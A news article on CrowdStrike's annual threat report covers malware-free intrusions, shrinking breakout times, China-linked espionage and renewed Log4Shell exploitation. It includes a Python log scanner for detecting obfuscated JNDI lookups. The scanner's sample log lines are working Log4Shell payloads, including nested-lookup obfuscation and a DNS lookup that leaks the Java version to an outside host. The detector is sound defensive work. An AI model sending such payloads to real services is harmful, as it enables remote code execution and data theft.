Threat actors getting smarter as China-linked attacks rise


Cybercriminals are seeking ways to evade antivirus products and other purely automated defenses, leaving security teams less and less time in which to respond.

“As organizations focus on managing remote and hybrid teams, operationalizing years of digital transformation and navigating an uncertain global economy, adversaries have become more sophisticated, relentless, and damaging in their attacks,” said CrowdStrike in its annual Global Threat Report.


In a sign that threat actors are turning to other methods of attack, the cybersecurity firm observed a continued decline in the share of detections that involved malware at all: in 2022, 71% of all detections were malware-free, up from 62% in 2021.

“This was partly related to adversaries’ prolific abuse of valid credentials to facilitate access and persistence in victim environments. Another contributing factor was the rate at which new vulnerabilities were disclosed and the speed with which adversaries were able to operationalize exploits,” CrowdStrike said.

Meanwhile, “interactive intrusion campaigns”, attacks in which an adversary works hands-on-keyboard inside the victim environment rather than relying on malware alone, increased by 50%, suggesting that threat actors are increasingly looking for ways to slip past automated detections.

Another notable trend is the fall in breakout time, the time it takes an adversary to move laterally from the initially compromised host to another system in the “victim environment”, the network being targeted. This declined from 98 minutes in 2021 to 84 minutes last year, leaving defenders less time to detect and contain an intrusion before it spreads.

“By responding within breakout time, defenders can minimize costs and other damages caused by attackers. Security teams are encouraged to meet the 1-10-60 rule: detecting threats within the first minute, understanding the threats within 10 minutes, and responding within 60,” said CrowdStrike.

China-linked actors ramp up attacks

CrowdStrike, which tracks over 200 adversaries, observed a surge in what it described as “China-nexus” espionage: last year, threat actors linked to the Asian superpower targeted all 39 global industry sectors across 20 geographic regions.

They primarily attacked organizations in East, Southeast, Central, and South Asia, operating in the government, technology, and telecommunications sectors. European and North American victims accounted for around a quarter of China-affiliated intrusions.


Threat actors attempted to collect strategic intelligence, compromise intellectual property, and surveil targeted groups, all key goals of the Chinese Communist Party (CCP). Such nation-state entities are known to target governments for intelligence, while attacking tech organizations to get their hands on research and development data, restricted information, and trade secrets.

“Telecommunications entities present adversaries with the capacity to amplify intelligence collection or surveillance efforts via direct access to foreign infrastructure,” CrowdStrike added.

Taiwan-based technology companies were a key target, likely in support of “CCP goals for technologic [sic] independence and dominance”; organizations on the disputed island are also believed to have been targeted by Chinese nationalist hacktivist groups.

Exploiting known vulnerabilities

According to CrowdStrike, last year adversaries reweaponized known vulnerabilities, such as the infamous Log4Shell, which continued to ravage the internet.

Exploitation of Log4Shell, largely opportunistic when the flaw emerged in late 2021, became more sophisticated as adversaries switched to other JNDI protocols and obfuscated their payloads to reach products where the original exploit had not worked.
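The obfuscation and protocol-swapping described above is easiest to see with a small detector. The following Python is an added example written for this page, not code from CrowdStrike or the Log4j project; the log lines are constructed, the IP addresses come from the documentation range, and the list of JNDI protocols it reports is illustrative rather than exhaustive. It URL-decodes web-server log lines, resolves the `lower`, `upper` and `:-` default-value lookups that attackers nest inside a payload to split the literal string `jndi`, and then reports which JNDI protocol the normalized lookup points at.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# A Log4j lookup with no further lookup nested inside it: ${...} containing no '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# After normalization the JNDI prefix is literal; Log4j matches the prefix case-insensitively,
# so ${JNDI:...} and ${jNdi:...} are both live. Group 1 is the protocol (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)


def _resolve(match: "re.Match[str]") -> str:
    """Evaluate the nesting tricks that leave text unchanged once Log4j expands them.

    ${lower:X} -> x, ${upper:x} -> X, ${env:UNSET:-x} / ${::-x} -> x (default value).
    Anything else (${jndi:...}, ${sys:...}, ${date:...}) is returned untouched.
    """
    body = match.group(1)
    key, sep, rest = body.partition(":")
    if sep and key.strip().lower() == "lower":
        return rest.lower()
    if sep and key.strip().lower() == "upper":
        return rest.upper()
    if ":-" in body:  # "${prefix:key:-default}" with an unset key yields the default
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode the line once, then collapse nested lookups from the inside out.

    max_rounds bounds work on pathological nesting; one decode handles the single
    percent-encoding seen in access logs (assumption: double-encoded payloads are out of scope).
    """
    text = unquote(line)
    for _ in range(max_rounds):
        expanded = _INNERMOST.sub(_resolve, text)
        if expanded == text:  # nothing left that we know how to resolve
            break
        text = expanded
    return text


@dataclass
class Finding:
    line_no: int
    protocol: str
    normalized: str


def scan(lines):
    """Return a Finding for every line that contains a JNDI lookup after normalization."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        hit = _JNDI.search(norm)
        if hit:
            findings.append(Finding(line_no, hit.group(1).lower(), norm))
    return findings


# Constructed sample log lines (not real traffic): plain, obfuscated, DNS-based, benign, URL-encoded.
SAMPLE_LOG = [
    '2022-12-01T10:00:00Z GET / HTTP/1.1 ua="${jndi:ldap://203.0.113.5:1389/a}"',
    '2022-12-01T10:00:01Z GET / HTTP/1.1 ua="${${lower:j}${upper:n}d${::-i}:${env:NOPE:-r}mi://203.0.113.5:1099/x}"',
    '2022-12-01T10:00:02Z GET / HTTP/1.1 ua="${jndi:dns://${sys:java.version}.203.0.113.5}"',
    '2022-12-01T10:00:03Z INFO user=alice action=login ua="Mozilla/5.0" note="${date:yyyy-MM-dd}"',
    "2022-12-01T10:00:04Z GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi via {f.protocol} -> {f.normalized}")
```

Line 2 is the case the report alludes to: naive substring matching on `${jndi:` sees nothing, but after the nested lookups collapse the payload reads `${jNdi:rmi://...}`. Line 3 shows why the protocol matters: a `dns://` lookup never needs a listening server and still exfiltrates whatever the inner lookup expands to, so a detector keyed only on `ldap` misses it.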

Vulnerabilities such as ProxyNotShell and Follina, both among the 1,200 vulnerabilities Microsoft patched in 2022, were broadly exploited “as nation-nexus and e-crime adversaries circumvented patches and sidestepped mitigations.”
